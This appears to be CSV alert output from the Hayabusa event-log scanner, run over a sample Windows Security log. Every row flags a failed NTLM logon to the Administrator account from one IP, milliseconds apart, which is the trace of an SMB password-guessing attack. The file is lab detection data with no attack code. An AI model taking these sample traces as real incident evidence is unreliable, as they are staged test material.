2016-09-20 01:51:39.429 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ziSXANiDAf7LRFz5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.527 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g0CvYYtyEcU2riBX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tPg2LKgWMeM0Oqo0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dbzL9T2d4RdeCz4q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.653 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PeEfbWpoipfYtOKv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.685 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RKJW1vSrIAbRTzyB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.730 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aU4G8NBru22Vc4Cl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sacBcqxV97FUihrd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.821 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 41Ms0lEMeT0jYxYj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.859 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AkQWVEHGM1NxowR0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.906 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4qKqRY7L2IQRoU57 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.954 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eMIkvwbvqc9V6CFs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.001 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PehzjCnK42ZPUE7e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.049 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1fqw2GWiYfO0kU83 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.094 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WFPJJNCFdPJl4igl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zc6CrAr7YoozKB6r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.192 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xHXminAIeV4ZJIK3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.241 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 06YmUCHNZqbaZMdZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.282 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fYoENCtP2uPy9xNh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TRJRuXJTTH1afAfH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.381 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MpnkzTlc3Uvj3hpY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.425 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oIuD8haFzR8P87rL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.475 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XL1IreMAiE564NXN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.520 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vMUiCaMGBC46MnPJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MOSWbwooyb60LExG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oSDNF7s3vbtkZIOz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.641 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JBMk0qOV6237XtK3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.694 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j41R1U1tYPvApCkZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.737 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OcPkVZSeg5VwChW8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.778 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aDLxt5gaFDTKsiVl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 94JvBKdxJkawQQMT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KgBMk00K3iC1GQem | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XdGOj9Ybm6bcCo3p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.950 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: by6F4YKorxhp5ahn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b1G6ZOgOaV6luDQN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.046 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qqSwNfvpPLQd6ZH1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.087 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mxtJJj54xSzHibHI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.129 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Y3yznfdaZ7dtwDO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: esllFn4asbLxwkBu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.202 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Pr0cgd6cF5ukhZ8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.249 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pS2fabTrbl6rZ1NB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.305 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FkylDDmUyuT57HdH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.337 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Aqs8rSvuLAQuhfDp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KI07KTgBJc4kBSKY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.421 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Re3n3nJ8EEhRRT3G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.465 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BzspAC3z1csEn0Ve | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.505 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tpkb6bf42SLUst3z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.546 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I1F5d2wn60OgAExW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bhPNRHWhTyonDPuA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.642 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zEsnyWpUuHVBo6et | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.685 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I2FwaWy9TALkk9eU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.778 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fuikeQsxlOUVifVj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZWdsRJp9fHypPI1d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B0j0IBX2eZnx99n9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.909 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YIZ5Knxg0xr0WmDb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.953 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wuej3f7mEoWmd4SX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.998 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B0LcCi06ilIhFPwb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.041 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jWsCGgoFmH06rRf4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.093 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bP47JjNKqtYIZPsC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.140 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mNlWZ9o0xf7bl2d0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.186 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hnPnB2lEN3BSDpXJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dVMyeF9jGuzHkTHg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.269 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sDKLl3PjW2qrzJGa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rkllnePSq3NQ5wgC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.359 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j9qLWgQnR7P9cs7s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.408 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C1AdU07nzvv7RB2i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.452 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cHgiB5SMiQtsl5oD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.499 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 03e7QOn36l0jH35H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.548 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DoJBywV8x8cURwrO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.583 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SDYGYO6s6g6Dbx8r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.621 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nUqXpeTNePFyBmCo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: T2h0qJWcbzRe1GSj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: edsfNOovOl1Ow503 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.740 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cxCC83XLMIJrNMvl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
